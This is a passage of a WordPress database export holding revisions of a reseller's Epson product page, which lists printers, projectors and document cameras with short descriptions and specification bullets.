4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:28:27','2019-09-25 09:28:27','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3472,1,'2019-09-25 17:28:51','2019-09-25 09:28:51','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" 